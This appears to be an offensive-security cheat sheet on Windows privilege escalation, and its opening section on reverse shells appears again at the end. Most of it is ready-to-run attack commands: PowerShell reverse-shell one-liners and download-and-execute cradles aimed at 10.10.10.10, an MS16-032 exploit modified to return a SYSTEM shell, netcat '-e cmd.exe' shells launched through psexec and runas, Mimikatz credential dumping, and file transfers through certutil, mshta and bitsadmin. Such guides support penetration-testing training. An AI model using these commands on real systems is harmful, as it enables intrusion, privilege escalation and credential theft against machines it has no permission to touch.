root@kali:~/test/nishang/Shells# echo Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 4444 >> Invoke-PowerShellTcp.ps1
root@kali:~/test/nishang/Shells# python -m SimpleHTTPServer 80

Now open up a netcat listener on Kali:

And Execute the remote powershell script hosted on your Kali SimpleHTTPServer

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

Upgrade Windows Command Line with a Powershell One-liner Reverse Shell:

You can run this oneliner from the remote Windows command prompt to skip the file upload step entirely (again be sure to update the IP and port):

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "^> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

Netcat Reverseshell Oneliners for Windows

Sometimes it is helpful to create a new Netcat session from an existed limited shell, webshell or unstable (short lived) remote shell.

Windows Enumeration

NOTE There are many executables that could provide privledge escalation if they are being run by a privledged user, most can be found on the incredible LOLBAS project:
https://lolbas-project.github.io/

Automated Windows Enumeration Scripts

We are also going to look a a few automated methods of performing Windows Enumeration including:

  • WindownPrivEsc.exe
  • Sherlock
  • Watson
  • JAWZ
  • Seatbelt

Running Windows Privesc Check (windows-privesc-check)

The Windows Privesc Check is a very powerful tool for finding common misconfigurations in a Windows system that could lead to privledge escalation. It has not been updated for a while, but it is still as effective today as it was 5 years ago. The downside of this script is that it was written in Python and if the target system does not have Python installed, you will need to use an executable version that has a Python interpreter built in. Having to include Python in the package makes the executable version is pretty large, coming in at a whopping 7.14 MB!!

First we will need to clone the latest version to our environment:

root@kali:~/tools# git clone https://github.com/pentestmonkey/windows-privesc-check
Cloning into 'windows-privesc-check'...
remote: Enumerating objects: 1232, done.
remote: Total 1232 (delta 0), reused 0 (delta 0), pack-reused 1232
Receiving objects: 100% (1232/1232), 34.79 MiB | 4.61 MiB/s, done.
Resolving deltas: 100% (897/897), done.

Next we will need to setup a simple python HTTP webserver in Kali to host the file which the remote Windows box can download it from:

root@kali:~/tools# cd windows-privesc-check/
root@kali:~/tools/windows-privesc-check# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now we will need to transfer the file to our remote windows box:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/windows-privesc-check2.exe", "C:\Users\Public\Downloads\windows-privesc-check2.exe");

And now we run the executeable on the remote machine. I like run with all the audit enabled like so:

C:UsersAdmin>cd ..
C:Users>cd Public
C:UsersPublic>cd Downloads
C:UsersPublicDownloads>windows-privesc-check2.exe --audit -a -o report
windows-privesc-check v2.0svn198 (http://pentestmonkey.net/windows-privesc-check)...

The windows-privesc-check will create a detailed HTML report and text based report for your review.

Running Sherlock

Sherlock is a powershell library with a number of privledge escalation checkers built in.
We can stage and run sherlock on a remote http server so the file never needs to hit the remote server’s HDD.

root@kali:~test# git clone https://github.com/rasta-mouse/Sherlock.git
Cloning into 'Sherlock'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 75 (delta 0), reused 2 (delta 0), pack-reused 72
Unpacking objects: 100% (75/75), done.
root@kali:~test# cd Sherlock/
root@kali:~test/Sherlock# ls
LICENSE  README.md  Sherlock.ps1
root@kali:~test/Sherlock# echo Find-AllVulns >> Sherlock.ps1
root@kali:~test/Sherlock# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now we can run this from the remote Windows CMD shell:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1'))"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Sherlock.ps1')

Running Watson

Sherlock has been superceded by a .net Windows enumeration platform called Watson which is frequently updated by the author.
It is a bit tricker to deploy and use as you need to compile it yourself and match the version of .net with the target system’s version.

First, on the target system we will need to check the versions of .Net that have been installed by navigating to the .net framework folder and poking around:

cdWindowsMicrosoft.NETFramework
dir /s msbuild

Only active versions of .NET will have the msbuild.exe.
Make note of the available versions and leverage that to compile your version of Watson that targets the remote Windows machine.
Download the latest version of Watson from github:

git clone https://github.com/rasta-mouse/Watson.git

And open it using Visual Studio. In the Solution Explorer, click the Properties and modify the «Target Framework:» value to align with the remote Windows machine’s version of the .Net framework. It will prompt you to reopen the project. Once the project has reloaded, Build the project under the Release mode (CTRL + SHIFT + B).

Next we will copy our Watson.exe to our Kali instance and setup a simple python HTTP webserver in Kali to host the file which the remote Windows box can download it from:

root@kali:~/tools# cd Watson/
root@kali:~/tools/Watson# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Now we will need to transfer the compiled Watson.exe file to our remote windows box:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/Watson.exe", "C:\Users\Public\Downloads\Watson.exe");

And now we run the executeable on the remote machine. I like run with all the audit enabled like so:

C:UsersAdmin>cd ..
C:Users>cd Public
C:UsersPublic>cd Downloads
C:UsersPublicDownloads>Watson.exe

Running JAWS — Just Another Windows (Enum) Script

JAWS is another powershell library that was built with privledge escalation of the OSCP lab machines in mind.
We can stage and run JAWS on a remote http server so the file never needs to hit the remote server’s HDD.

root@kali:~test# git clone https://github.com/411Hall/JAWS

Now we can run this from the remote Windows CMD shell:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/jaws-enum.ps1'))"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/jaws-enum.ps1')

And we should see the following output start to appear:

Running J.A.W.S. Enumeration
        - Gathering User Information
        - Gathering Processes, Services and Scheduled Tasks
        - Gathering Installed Software

Fireeye Session Gopher

Leveraging credentials is still the most common ways of privledge escalation in Windows environments. Session Gopher is a PowerShell script designed to automaticlly harvest credentials from commonly used applications.

To run Session Gopher, we will first need to pull down the latest version from the Fireeye github repository:

git clone https://github.com/fireeye/SessionGopher
Cloning into 'SessionGopher'...
remote: Enumerating objects: 48, done.
Unpacking objects: 100% (48/48), done.
remote: Total 48 (delta 0), reused 0 (delta 0), pack-reused 48

Next we can serve it up on our local KALI instance by using the simple python HTTP server:

root@kali:~/tools# cd SessionGopher/
root@kali:~/tools/SessionGopher# ls
README.md  SessionGopher.ps1
root@kali:~/tools/SessionGopher# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Finally we can file-lessly execute it from our remote Windows shell:

@"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/SessionGopher.ps1')); Invoke-SessionGopher -Thorough"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/SessionGopher.ps1')

Or we can download and run it:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/SessionGopher.ps1", "C:\Users\Public\Downloads\SessionGopher.ps1");
CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "& { . .SessionGopher.ps1; Invoke-SessionGopher -Thorough}"

Running Mimikatz

Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.
https://github.com/gentilkiwi/mimikatz

Running traditional (binary) Mimikatz

The original and most frequently updated version of Mimikatz is the binary executable which can be found here:
https://github.com/gentilkiwi/mimikatz/releases

First we will need to download a Mimikatz binary and copy it to the remote machine

root@kali:~/test# wget https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip     
--2018-10-16 15:14:49--  https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip                     
root@kali:~/test# unzip mimikatz_trunk.zip

Now we will need to copy the 3 files (win32 or x64 depending on the OS) required to run Mimikatz to the remote server.

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/mimidrv.sys", "C:\Users\Public\Downloads\mimidrv.sys"); (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/mimikatz.exe", "C:\Users\Public\Downloads\mimikatz.exe"); (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/mimilib.dll", "C:\Users\Public\Downloads\mimilib.dll")"

Now, if we dont have an overly interactive shell, we will want to execute Mimikatz without the built in CLI by passing the correct parameters to the executable. We use the log parameter to also log the clear password results to a file (just in case we are unable to see the output).

mimikatz log version "sekurlsa::logonpasswords" exit

Otherwise we can use the Mimikatz shell to get the passwords:

mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords

Running Powershell Mimikatz

The Powershell version is not as frequently updated, but can be loaded into memory without ever hitting the HDD (Fileless execution). This version simply reflectively loads the Mimikatz binary into memory so we could probably update it ourselves without much difficulty.

wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1

Fileless execution of Mimikatz from remotely hosted server:

PS C:> IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Windows Kernel Exploits

MS16-032

If the remote machine appears to be vulnerable to MS16-032, we can execute a powershell script from a remote server to exploit it.

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Get the Powershell script from FuzzySecurity’s Github, add an invoke to the end of the script and share the folder using the python SimpleHTTPServer:

root@kali:~test# git clone https://github.com/FuzzySecurity/PowerShell-Suite.git
Cloning into 'PowerShell-Suite'...
remote: Enumerating objects: 378, done.
remote: Total 378 (delta 0), reused 0 (delta 0), pack-reused 378
Receiving objects: 100% (378/378), 5.94 MiB | 2.06 MiB/s, done.
Resolving deltas: 100% (179/179), done.
root@kali:~test# cd PowerShell-Suite/
root@kali:~test/PowerShell-Suite# echo Invoke-MS16-032 >> Invoke-MS16-032.ps1 
root@kali:~test/PowerShell-Suite# python -m Simple
SimpleDialog        SimpleHTTPServer    SimpleXMLRPCServer  
root@kali:~test/PowerShell-Suite# python -m SimpleHTTPServer 80

The default version of the MS16-032 script will create a Pop-up CMD.exe window on the remote machine. Unfortunatly, we cannot access this from a limited shell… BUT we can modify the exploit to call a reverse shell. Its pretty easy to modify it to call a reverse powershell that will connect back to our machine with a System shell. We will need to modify line 330 of the exploit (the ip address and port will need to be updated of course):

		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
		#$CallResult = [Advapi32]::CreateProcessWithLogonW(
		#	"user", "domain", "pass",
		#	0x00000002, "C:WindowsSystem32cmd.exe", "",
		#	0x00000004, $null, $GetCurrentPath,
		#	[ref]$StartupInfo, [ref]$ProcessInfo)

		# Modified to create a Powershell reverse shell 
		$CallResult = [Advapi32]::CreateProcessWithLogonW(
			"user", "domain", "pass",
			0x00000002, 
			'C:WindowsSystem32WindowsPowerShellv1.0powershell.exe', 
			'-NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "^> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"',
			0x00000004, $null, $GetCurrentPath,
			[ref]$StartupInfo, [ref]$ProcessInfo)

On the remote host execute the exploit:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-MS16-032.ps1'))"

Or from a Windows Powershell:

PS C:> IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Invoke-MS16-032.ps1')

Or if you wanted to upload the exploit, you can always run it like this:

PS C:> powershell -ExecutionPolicy ByPass -command "& { . C:UsersPublicInvoke-MS16-032.ps1; Invoke-MS16-032 }"

On our Kali machine we create the reverse shell and … BOOM! Root dance.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.10.11] from (UNKNOWN) [10.10.10.10] 49182

PS C:Usersjimmy^> whoami
nt authoritysystem

Windows Run As

Prior to successfully performing a Windows run as, we of course need a valid windows username and password.
Here is a oneliner powershell script to verify a username / password is valid on the local system:

Requires .Net 3.5

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$username = '<username here>'; $password = '<password here>'; $computer = $env:COMPUTERNAME; Add-Type -AssemblyName System.DirectoryServices.AccountManagement; $obj = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('machine',$computer); $obj.ValidateCredentials($username, $password); }"

Requires .Net 2.0

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "&{$username = '<username here>'; $password = '<password here>'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Start-Process -FilePath C:WindowsSystem32calc.exe -NoNewWindow -Credential $credential; }"

Switching users in linux is trival with the SU command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.

Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).

 C:>psexec64 \COMPUTERNAME -u Test -p test -h "c:userspublicnc.exe -nc 192.168.1.10 4444 -e cmd.exe" 
 PsExec v2.2 - Execute processes remotely
 Copyright (C) 2001-2016 Mark Russinovich
 Sysinternals - www.sysinternals.com

Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:

 C:>C:WindowsSystem32runas.exe /env /noprofile /user:Test "c:userspublicnc.exe -nc 192.168.1.10 4444 -e cmd.exe"
 Enter the password for Test:
 Attempting to start nc.exe as user "COMPUTERNAMETest" ...

PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.

 $username = '<username here>'
 $password = '<password here>'
 $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
 $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
 Start-Process -FilePath C:UsersPublicnc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:UsersPublic

Next run this script using powershell.exe:

CMD C:> powershell -ExecutionPolicy ByPass -command "& { . C:UserspublicPowerShellRunAs.ps1; }"

Other files

Here are few other handy scripts and things…

Capture a screen shot

The following powershell commands can be used to capture a screen shot of the remote computers desktop and store it as a BMP file.

Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save('screen1.bmp')

If you are on CMD you can use this handy one-liner to execute the same powershell command

@"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-type -AssemblyName System.Drawing; $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height; $graphic = [System.Drawing.Graphics]::FromImage($bitmap); $graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size); $bitmap.Save('screen1.bmp')"

CopyAndPasteFileDownloader.bat

Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line)

CopyAndPasteEnum.bat

No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial).
Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report

enumeration.md

Basic notes on Windows Enumeration from the OSCP.

windows_recon.bat

An uploadable batch file for performing basic windows enumeration.

References
https://medium.com/@hakluke
https://daya.blog/2018/01/06/windows-privilege-escalation/
https://pentestlab.blog/2017/04/19/stored-credentials/
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://www.abatchy.com/
https://gist.github.com/egre55
https://github.com/egre55/ultimate-file-transfer-list
https://lolbas-project.github.io/
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://github.com/GhostPack/Seatbelt
https://github.com/rasta-mouse/Watson
http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb

Windows-Privilege-Escalation

Here is my step-by-step windows privlege escalation methodology. This guide assumes you are starting with a very limited shell like a webshell, netcat reverse shell or a remote telnet connection.

First things first and quick wins

Do some basic enumeration to figure out who we are, what OS this is, what privs we have and what patches have been installed.

whoami
net user <username>
systeminfo
net config Workstation 
net users 

What is running on the machine?
If we are able to run WMIC we can pull rich details on the services and applications running:

wmic service list full > services.txt
wmic process > processes.txt

Or alternatively:

Has a Windows Auto-login Password been set?

reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"

Dump a tree of all the folders / files on the HDD

tree c: > c:userspublicfolders.txt

or for a list of files:

dir /s c: > c:userspublicfiles.txt

Uploading files to the Windows machine

Sometimes we will want to upload a file to the Windows machine in order to speed up our enumeration or to privilege escalate. Often you will find that uploading files is not needed in many cases if you are able to execute PowerShell that is hosted on a remote webserver (we will explore this more in the upgrading Windows Shell, Windows Enumeration and Windows Exploits sections). Uploading files increased the chances of being detected by antivirus and leaves unnecssary data trail behind.
We will look at 4 ways of uploading files to a remote Windows machine from Kali Linux:

  1. VBScript HTTP Downloader
  2. PowerShell HTTP Downloader
  3. Python HTTP Downloader
  4. FTP Downloader

NOTE There are MANY more ways to move files back and forth between a Windows machine, most can be found on the LOLBAS project:
https://lolbas-project.github.io/

Most of these will require that we create a simple local webserver on our Kali box to sevre the files (NOTE: I have had issues running this command within TMUX for whatever reason… so dont run it in TMUX).
I like to use the Python Simple HTTP Server:

root@kali:~/Documents/Exploits/WindowsPRIVZ# python -m SimpleHTTPServer 80

Or the Python pyftpdlib FTP Server (again don’t run from TMUX):

apt-get install python-pyftpdlib
root@kali:~/Documents/Exploits/WindowsPRIVZ# python -m pyftpdlib -p 21

Uploading Files with VBScript

In my experiance, VBScript is one of the easiest methods of transfering files to a remote Windows. The only downside is that the file size you can transfer is rather limited. I often have trouble transfering anything over 1 MB using this method and have to fall back on other methods (Windows-privesc-check2.exe is much too large to transfer using this method).
First lets test to see if we can run VBScript

echo WScript.StdOut.WriteLine "Yes we can run vbscript!" > testvb.vbs

Now we run it to see the results:

If you see the following message, we are good to go with VBScript!:

C:UsersTest>cscript testvb.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Yes we can run vbscript!

If you see the following messages, you should move on to PowerShell:

C:temp>cscript testvb.vbs
This program is blocked by group policy. For more information, contact your system administrator.
C:temp>testvb.vbs
Access is denied.

Now we can create a very simple downloader script by copying and pasting this single line of code into your windows commandline. I have tried to create a VBS script to download files from a remote webserver with the least possible number of lines of VBS code and I believe this is it.
If Windows is an older version of windows (Windows 8 or Server 2012 and below) use the following script:

CMD C:> echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")  > dl.vbs &echo dim bStrm: Set bStrm = createobject("Adodb.Stream")  >> dl.vbs &echo xHttp.Open "GET", WScript.Arguments(0), False  >> dl.vbs &echo xHttp.Send >> dl.vbs & echo bStrm.type = 1 >> dl.vbs &echo bStrm.open >> dl.vbs & echo bStrm.write xHttp.responseBody >> dl.vbs &echo bStrm.savetofile WScript.Arguments(1), 2 >> dl.vbs

If Windows is a newer version (Windows 10 or Server 2016), try the following code:

CMD C:> echo dim xHttp: Set xHttp = CreateObject("MSXML2.ServerXMLHTTP.6.0")  > dl.vbs &echo dim bStrm: Set bStrm = createobject("Adodb.Stream")  >> dl.vbs &echo xHttp.Open "GET", WScript.Arguments(0), False  >> dl.vbs &echo xHttp.Send >> dl.vbs &echo bStrm.type = 1 >> dl.vbs &echo bStrm.open >> dl.vbs &echo bStrm.write xHttp.responseBody >> dl.vbs &echo bStrm.savetofile WScript.Arguments(1), 2 >> dl.vbs

Now try to download a file to the local path:

CMD C:> cscript dl.vbs "http://10.10.10.10/archive.zip" ".archive.zip"

Uploading Files with CertUtil.exe

I’ve found that CertUtil can be quite reliable when all else seems to fail.

certutil.exe -urlcache -split -f http://10.10.10.10/exploit.exe

Transfering Files using MSHTA

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). And it can also be used to transfer files :D
HTML:

C:>mshta http://10.10.10.10/badthings.exe

FTP:

C:>mshta ftp://10.10.10.10:21/badthings.exe

Trasfering Files using Bitsadmin

Background Intelligent Transfer Service (BITS) is a component of Microsoft Windows XP and later iterations of the operating systems, which facilitates asynchronous, prioritized, and throttled transfer of files between machines using idle network bandwidth. BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center.

C:>bitsadmin /transfer badthings http://10.10.10.10:80/badthings.exe c:userspublicpayload.exe

Uploading Files with PowerShell

Test to see if we can run Powershell:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "get-host"

Test to see if we can run Powershell Version 2:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -Version 2 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "$PSVersionTable"

Try to download a file from a remote server to the windows temp folder from the Windows command line:

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/exploit.exe", "C:\Users\Public\Downloads\exploit.exe")"

Or from a PowerShell… shell:

PS C:> IEX(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/exploit.exe", "C:\Users\Public\Downloads\exploit.exe")"

OR This one seems to work better while at the console:

PS C:> IEX(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/exploit.exe", "C:UsersPublicDownloadsexploit.exe")

Uploading Files with Python

Sometimes a Windows machine will have development tools like Python installed.
Check for python

Download a file using Python:

python -c "import urllib.request; urllib.request.urlretrieve('http://10.10.10.10/cat.jpg', 'C:\Users\Public\Downloads\cat.jpg');"

Uploading Files with Perl

Sometimes a Windows machine will have development tools like PERL installed.
Check for PERL

Download a file using PERL:

perl -le "use File::Fetch; my $ff = File::Fetch->new(uri => 'http://10.10.10.10/nc.exe'); my $file = $ff->fetch() or die $ff->error;"

Uploading Files with FTP

After running the python ftp lib on (python -m pyftpdlib -p 21) on Kali, you can try connecting using the windows FTP client:

C:Userspwnd>ftp 10.10.10.10
Connected to 10.10.10.10
220 pyftpdlib 1.5.3 ready.
User (10.10.15.31:(none)): anonymous
331 Username ok, send password.
Password: anonymous

230 Login successful.                                                                                                                      
ftp> ls                                                                                                                                 
dir                                                                                                                                       
421 Active data channel timed out.                                                                                                       

If you are seeing a 421 timeout when you try to send a command it is likely because your connection is being blocked by the windows firewall. The Windows command-line ftp.exe supports the FTP active mode only. In the active mode, the server has to connect back to the client to establish data connection for a file transfer.

You can check to see if the remote machine has Winscp.exe installed. Winscp is capable of connecting to an FTP server using passive mode and will not be blocked by the firewall.

Transfering Files via SMB using Impacket

Kali comes loade with the incredible Impacket library which is a swiss army knife of network protocols… just Awesome. You can easily create a SMB share on your local Kali machine and move files between Kali and Windows with ease.
https://github.com/SecureAuthCorp/impacket

First we will setup the SMB Share on Kali like so:

root@kali:~# impacket-smbserver root /root/Desktop
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
                                                                    

Confirm it is up and running using Net View on the Windows command line:

C:UsersNull>net view \192.168.0.49
Shared resources at \192.168.0.49

(null)

Share name  Type  Used as  Comment

-------------------------------------------------------------------------------
smbshare    Disk
The command completed successfully.

Then we can trasnfer files from the command line as if it were a normal folder:

C:UsersAdmin>dir \192.168.0.49smbshare 
C:UsersAdmin>copy \192.168.0.49smbshareloot.zip .  

By far the most interesting feature of the SMB Share method is that you can execute files directly over the SMB Share without copying them to the remote machine (fileless execution is so hot right now):

C:UsersAdmin>\192.168.0.49smbsharepayload.exe

A fancy trick I learned from IPPSec is to create a mapped drive to a remote SMB share like so:

net use y: \192.168.0.49smbshare  
y: 
dir 

Execute a remote shell dropper

Often, you can leverage PowerShell to execute a remotely hosted powershell script which contains a shell dropper (generated by the platform of your choosing).

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -WindowStyle hidden -NonInteractive -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

There are also some no-so-well documented PowerShell argument shortcuts so can use things like -w rather than -WindowsStyle (handy for smaller payloads):

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -w hidden -noni -nop -i None -ex Bypass -c "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

Upgrading your Windows Shell

You might find that you are connected with a limited shell such as a Web shell, netcat shell or Telnet connection that simply is not cutting it for you. Here are a few oneliners you can use to upgrade your shell:

Upgrade Shell with PowerShell Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

root@kali:~/test# git clone https://github.com/samratashok/nishang.git                                                  
Cloning into 'nishang'...
remote: Enumerating objects: 1612, done.
remote: Total 1612 (delta 0), reused 0 (delta 0), pack-reused 1612
Receiving objects: 100% (1612/1612), 5.87 MiB | 6.62 MiB/s, done.
Resolving deltas: 100% (1010/1010), done.
root@kali:~/test# cd nishang/
root@kali:~/test/nishang# cd Shells/
root@kali:~/test/nishang/Shells# echo Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 4444 >> Invoke-PowerShellTcp.ps1
root@kali:~/test/nishang/Shells# python -m SimpleHTTPServer 80

Now open up a netcat listener on Kali:

And Execute the remote powershell script hosted on your Kali SimpleHTTPServer

CMD C:> @"%SystemRoot%System32WindowsPowerShellv1.0powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"

Upgrade Windows Command Line with a Powershell One-liner Reverse Shell:

You can run this oneliner from the remote Windows command prompt to skip the file upload step entirely (again be sure to update the IP and port):

